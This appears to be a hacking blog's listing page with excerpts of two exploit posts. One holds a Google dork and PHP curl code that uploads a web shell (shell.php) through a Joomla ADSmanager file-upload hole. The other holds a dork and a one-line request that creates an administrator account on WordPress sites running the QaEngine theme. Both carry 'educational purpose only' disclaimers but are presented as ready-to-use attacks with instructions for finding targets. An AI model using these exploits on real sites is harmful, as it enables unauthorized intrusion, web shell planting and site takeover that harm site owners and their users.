Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability

Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability   Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org CODE PHP : <?php $url = “blabla.com/index.php?option=com_adsmanager&task=upload&tmpl=component”; // put URL Here $post = array ( “file” => “@shell.jpg”, “name” => “shell.php” ); $ch = curl_init (“$url“); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt ($ch, CURLOPT_USERAGENT, “Mozilla/5.0[…] Continue reading

Plz Share Share on FacebookShare on Google+Share on LinkedInTweet about this on TwitterEmail this to someoneShare on RedditShare on TumblrDigg thisBuffer this pagePrint this pagePin on PinterestShare on StumbleUponFlattr the author

WordPress QaEngine Theme Exploit – Add User Admin

WordPress QaEngine Theme Exploit – Add User Admin This video demonstrate how to exploit wordpress QaEngine theme. This Exploit add user with administrator role. Note: ONLY for Educational Purpose. Dork = inurl:wp-content/themes/qaengine Exploit = /wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=username&user_pass=password&role=administrator Note: For Any Illegal Activity Hackaholic will not be responsible. Only For Educational Purpose. Plz[…] Continue reading

Plz Share Share on FacebookShare on Google+Share on LinkedInTweet about this on TwitterEmail this to someoneShare on RedditShare on TumblrDigg thisBuffer this pagePrint this pagePin on PinterestShare on StumbleUponFlattr the author